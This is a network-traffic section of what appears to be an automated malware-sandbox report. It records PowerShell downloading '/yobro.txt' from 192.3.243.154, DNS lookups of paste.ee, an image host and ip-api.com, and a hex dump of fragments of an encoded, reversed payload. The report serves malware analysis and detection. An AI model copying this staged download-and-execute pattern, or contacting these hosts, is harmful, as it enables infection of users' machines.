                                                                                  Apr 24, 2024 06:54:18.181056023 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181092024 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.181129932 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181200027 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181255102 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.181333065 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181401014 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181437969 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.181478024 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181545973 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.181580067 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.181802034 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182212114 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182250977 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.182267904 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182329893 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182344913 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182363987 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.182455063 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182471037 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182493925 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.182516098 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182559013 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.182593107 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182667971 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182708979 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.182740927 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182867050 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.182908058 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.182957888 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183039904 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183078051 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183104038 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183181047 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183227062 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183231115 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183295965 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183340073 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183407068 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183489084 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183532953 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183571100 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183682919 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183726072 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183748007 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183824062 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183857918 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183862925 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183917999 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.183957100 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.183980942 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184043884 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184081078 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.184613943 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184689045 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184731007 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.184751034 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184864044 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184907913 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.184933901 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184950113 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.184989929 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.185029030 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185113907 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185158014 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.185158968 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185246944 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185286045 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.185412884 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185436964 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185477972 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.185843945 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185916901 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.185956955 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.186101913 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186153889 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186199903 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.186213970 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186312914 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186326981 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186351061 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.186379910 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186422110 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.186448097 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186530113 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186564922 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.186580896 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186722040 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.186764002 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.186780930 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187005043 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187048912 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.187136889 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187215090 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187251091 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.187366962 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187412977 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187453985 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.187493086 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187613964 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187634945 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187657118 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.187829971 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187875032 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.187902927 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.187966108 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.188008070 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.188021898 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.188035965 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.188082933 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.188105106 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.188519001 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.188563108 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.188564062 CEST8049733192.3.243.154192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.230202913 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.303857088 CEST4973380192.168.2.4192.3.243.154
                                                                                  Apr 24, 2024 06:54:18.754549980 CEST4973480192.168.2.4208.95.112.1
                                                                                  Apr 24, 2024 06:54:18.917140007 CEST8049734208.95.112.1192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.917212963 CEST4973480192.168.2.4208.95.112.1
                                                                                  Apr 24, 2024 06:54:18.918140888 CEST4973480192.168.2.4208.95.112.1
                                                                                  Apr 24, 2024 06:54:19.078073025 CEST8049734208.95.112.1192.168.2.4
                                                                                  Apr 24, 2024 06:54:19.121387005 CEST4973480192.168.2.4208.95.112.1
                                                                                  Apr 24, 2024 06:54:50.967828035 CEST8049734208.95.112.1192.168.2.4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 24, 2024 06:54:07.826339006 CEST6432353192.168.2.41.1.1.1
                                                                                  Apr 24, 2024 06:54:07.982528925 CEST53643231.1.1.1192.168.2.4
                                                                                  Apr 24, 2024 06:54:11.500341892 CEST6060053192.168.2.41.1.1.1
                                                                                  Apr 24, 2024 06:54:11.943312883 CEST53606001.1.1.1192.168.2.4
                                                                                  Apr 24, 2024 06:54:18.591363907 CEST6091553192.168.2.41.1.1.1
                                                                                  Apr 24, 2024 06:54:18.748905897 CEST53609151.1.1.1192.168.2.4
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Apr 24, 2024 06:54:07.826339006 CEST192.168.2.41.1.1.10xe2f5Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                  Apr 24, 2024 06:54:11.500341892 CEST192.168.2.41.1.1.10x22d7Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                                                                  Apr 24, 2024 06:54:18.591363907 CEST192.168.2.41.1.1.10x878aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Apr 24, 2024 06:54:07.982528925 CEST1.1.1.1192.168.2.40xe2f5No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                  Apr 24, 2024 06:54:07.982528925 CEST1.1.1.1192.168.2.40xe2f5No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                  Apr 24, 2024 06:54:11.943312883 CEST1.1.1.1192.168.2.40x22d7No error (0)uploaddeimagens.com.br104.21.45.138A (IP address)IN (0x0001)false
                                                                                  Apr 24, 2024 06:54:11.943312883 CEST1.1.1.1192.168.2.40x22d7No error (0)uploaddeimagens.com.br172.67.215.45A (IP address)IN (0x0001)false
                                                                                  Apr 24, 2024 06:54:18.748905897 CEST1.1.1.1192.168.2.40x878aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                  • paste.ee
                                                                                  • uploaddeimagens.com.br
                                                                                  • 192.3.243.154
                                                                                  • ip-api.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449733192.3.243.154803744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Apr 24, 2024 06:54:17.374543905 CEST72OUTGET /yobro.txt HTTP/1.1
                                                                                  Host: 192.3.243.154
                                                                                  Connection: Keep-Alive
                                                                                  Apr 24, 2024 06:54:17.539608955 CEST1289INHTTP/1.1 200 OK
                                                                                  Content-Type: text/plain
                                                                                  Last-Modified: Tue, 23 Apr 2024 21:00:41 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  ETag: "2d38da4cc195da1:0"
                                                                                  Server: Microsoft-IIS/10.0
                                                                                  Date: Wed, 24 Apr 2024 04:54:17 GMT
                                                                                  Content-Length: 325632
                                                                                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 44 45 41 41 41 41 4d 41 77 41 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 43 4e 34 54 65 73 4a 57 62 6c 4e 33 63 68 39 43 50 4b 30 67 50 76 5a 6d 62 4a 52 33 63 31 4a 48 64 76 77 44 49 67 6f 51 44 2b 6b 48 64 70 4a 58 64 6a 56 32 63 76 77 44 49 67 41 43 49 4b 30 67 50 7a 56 32 5a 6c 78 57 61 32 6c 6d 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49
                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DEAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lmcQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHI
                                                                                  Apr 24, 2024 06:54:17.539632082 CEST1289INData Raw: 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c 78 6b 62 76 6c 47 64 31 4e 57 5a 34 56 45 5a 6c 52 33 63 6c 56 58 63 6c 4a 48 50 67 41 43 49 67 41 43 49 67 41 69 43 4e 34 6a 49 7a 59 6e 4c 74 4e 58 59 36 30
                                                                                  Data Ascii: iIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZm
                                                                                  Apr 24, 2024 06:54:17.539695978 CEST1289INData Raw: 41 41 4a 41 41 41 41 41 41 77 62 41 59 47 41 75 42 51 53 41 55 47 41 73 42 51 61 41 59 45 41 79 42 51 59 41 59 46 41 42 41 41 41 41 51 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 77
                                                                                  Data Ascii: AAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOBwTAkEATBgUAUEAWBwXAMFAWBAAAQjA8CAAAAAAAAAAAAQAqDwAjzFAAAAAAAAAAAAACwLADAOoAAAAQCAAAAAABAAAAAAAAAAAAAAAAAAA
                                                                                  Apr 24, 2024 06:54:17.539736986 CEST1289INData Raw: 51 48 44 30 42 32 42 47 78 41 48 6b 51 49 52 49 51 41 67 55 41 48 63 34 67 44 44 41 67 42 49 45 53 45 6b 48 6f 45 4a 55 51 48 4a 6b 41 34 42 4b 42 43 48 41 42 43 49 30 68 45 44 63 67 42 49 45 53 45 6b 48 6f 45 49 55 51 48 49 59 77 42 4d 67 51 48
                                                                                  Data Ascii: QHD0B2BGxAHkQIRIQAgUAHc4gDDAgBIESEkHoEJUQHJkA4BKBCHABCI0hEDcgBIESEkHoEIUQHIYwBMgQHSIwBFgQUSUxgSMwBIgACF0RADAyBIElEF0RFDKBBHoQ/CKRgAKRUSEwAgsQ7CGREDGREDGRADACDFCoEAAQBNMoEBMoEBAAC5LoEGQQ9CKRHAAiBKkvgSEgAgcACIEgAgUQBDGBAgUQCDKBAAUACFMYEFMYEFMYEF
                                                                                  Apr 24, 2024 06:54:17.540029049 CEST1289INData Raw: 47 59 6b 77 42 50 67 41 43 49 55 51 48 46 30 52 42 64 59 77 42 4c 67 41 43 49 67 41 43 46 30 68 42 48 6b 41 43 42 6f 77 41 49 67 41 43 49 55 51 48 46 63 41 43 49 55 51 48 56 49 6f 45 46 30 52 46 43 4b 52 42 48 30 41 43 4f 55 68 67 53 55 51 48 56
                                                                                  Data Ascii: GYkwBPgACIUQHF0RBdYwBLgACIgACF0hBHkACBowAIgACIUQHFcACIUQHVIoEF0RFCKRBH0ACOUhgSUQHVIoEFcADI4QFCKRBdUhgSUQHOcwBPgQFCKR0BKRBdUhgSUjgSkhgSUQHIcgFcIQAgQAgBKRAhDYEVgAHO0hECAiBIAYgSEQ4AGRFIUQHIUQHIUQH8FYEAGoEFUQBdIRHS8wBhgAfBGBgBKBgBKBgBKBgBKRHAGoEdA
                                                                                  Apr 24, 2024 06:54:17.540096045 CEST1289INData Raw: 42 41 69 42 68 4a 59 45 4f 45 67 41 67 63 41 43 35 4a 52 2b 42 4b 52 42 64 55 51 48 74 47 6f 45 6c 48 6f 45 46 30 68 44 4a 63 51 46 49 67 67 44 64 41 55 67 53 55 51 48 49 34 67 44 4f 67 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4f 45 51 54 53 55
                                                                                  Data Ascii: BAiBhJYEOEgAgcAC5JR+BKRBdUQHtGoElHoEF0hDJcQFIggDdAUgSUQHI4gDOgVgS4AQBKRANJRFOEQTSURDH8BCI4QHI4QHI4QHO0RlBKRICKhDVGoEhIoEO4QHO0hDO4QANJRFO0hDVcgKIknE5HoE5JR+BKhDBEOgRURrBKRrBKhDOEQTSUhDB0kEVswBkggDBEOgRUBQBKhDOEQTSUBQBKRANJRFGcQGCgRACASBIgACCAQ
                                                                                  Apr 24, 2024 06:54:17.540160894 CEST1289INData Raw: 55 52 43 48 59 43 43 4a 47 6f 45 4a 47 6f 45 42 4d 41 41 4b 67 67 44 56 49 6f 45 46 30 52 30 42 4b 52 46 43 4b 52 42 64 55 51 48 46 30 52 42 64 55 51 48 31 49 6f 45 46 30 52 44 48 34 42 43 49 34 77 41 4f 34 67 42 48 67 51 42 49 45 41 41 45 67 41
                                                                                  Data Ascii: URCHYCCJGoEJGoEBMAAKggDVIoEF0R0BKRFCKRBdUQHF0RBdUQH1IoEF0RDH4BCI4wAO4gBHgQBIEAAEgAQBKBCO0RBdUQHIgQBd4AQBKRANJRFOwwBagACI0BCI0BCdgQHIgQHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABxIYEtIYEpIYEOEABg0ACAFoEBEOgRUhDBEOgRUhDBEOgRUhDBEOgRUBQBKRANJRFAFoEC4ACIgAC
                                                                                  Apr 24, 2024 06:54:17.540214062 CEST1289INData Raw: 41 43 4f 34 41 43 4f 34 41 43 4f 67 41 43 4f 45 51 54 53 55 42 43 4f 45 51 54 53 55 78 41 4f 45 51 54 53 55 68 44 53 63 41 49 49 67 41 43 49 51 77 42 47 77 68 44 4f 49 41 41 46 67 67 44 42 41 41 42 63 34 41 48 43 41 53 42 49 67 67 44 64 41 55 67
                                                                                  Data Ascii: ACO4ACO4ACOgACOEQTSUBCOEQTSUxAOEQTSUhDScAIIgACIQwBGwhDOIAAFggDBAABc4AHCASBIggDdAUgSEQTSUBQBKhDO4gDlGoEOUagS4AQBKRANJRFOcwIRHoEAASBIUQHOEggSUQHNHoEF0xBHABCI4QHAFoEF0RpBKhDlGoEOAUgSEQTSUhCHoBCI4QHAFoEB0kEVAUgS4gDdAUgSEQTSUBCHoBCAFoEB0kEVAUgS4QfB
                                                                                  Apr 24, 2024 06:54:17.540245056 CEST1289INData Raw: 45 42 30 6b 45 56 73 77 42 68 67 51 42 42 41 41 42 49 67 51 42 64 4d 77 42 47 67 77 41 42 41 41 42 46 30 68 41 4f 55 61 67 53 45 41 49 47 55 61 67 53 59 41 42 49 4d 51 48 44 30 78 41 64 67 67 44 64 67 67 44 64 67 67 44 64 34 51 48 41 46 6f 45 46
                                                                                  Data Ascii: EB0kEVswBhgQBBAABIgQBdMwBGgwABAABF0hAOUagSEAIGUagSYABIMQHD0xAdggDdggDdggDd4QHAFoEF0hDlGoEOUagS4QpBKhDF0hDdAUgSEQTSUxFHETnBKBAgUAAT0BAgUACI4QHI4QHAFoEO4gDIUQHYFoEOAUgSEQTSUhDOEQTSUhDRcAJO0ZgSEAAG4QAhDYEVYAChEBCO0hDBEOgRUBQBKRBd4gDC0lEVUQHO4gDdg
                                                                                  Apr 24, 2024 06:54:17.540311098 CEST1289INData Raw: 73 46 6f 45 42 45 4f 67 52 55 42 43 51 48 6f 45 42 30 6b 45 56 63 41 62 42 4b 52 41 4e 4a 52 46 48 67 51 64 52 34 51 48 51 48 6f 45 42 45 4f 67 52 55 42 62 42 4b 52 41 68 44 59 45 56 41 64 67 53 41 64 67 53 77 57 67 53 41 64 67 53 45 51 54 53 55
                                                                                  Data Ascii: sFoEBEOgRUBCQHoEB0kEVcAbBKRANJRFHgQdR4QHQHoEBEOgRUBbBKRAhDYEVAdgSAdgSwWgSAdgSEQTSUBbBKRANJRFKcgLdIBAgQwAd4QAgUgDdIRAgUAATAAIEAUgSEQ4AGRFIAwEBEOgRUBAgkAQBKRANJRFHgwAdUXEO0BQBKRAhDYEVAUgS0hEAFoEB0kEVgwBd4gDO4gDEAwBIUXEO0RdR4QH1FhDd4ACHAhDd4QAAUQ
                                                                                  Apr 24, 2024 06:54:17.699448109 CEST1289INData Raw: 41 77 42 43 41 67 42 43 41 51 42 43 41 41 42 43 41 77 41 43 41 67 41 43 41 51 41 43 41 41 41 43 67 64 67 52 59 41 42 4f 55 51 48 42 49 41 41 47 34 67 44 42 49 41 41 46 6b 68 45 41 41 41 42 4f 6b 49 67 53 34 67 41 41 63 51 68 41 4b 52 67 41 4b 52
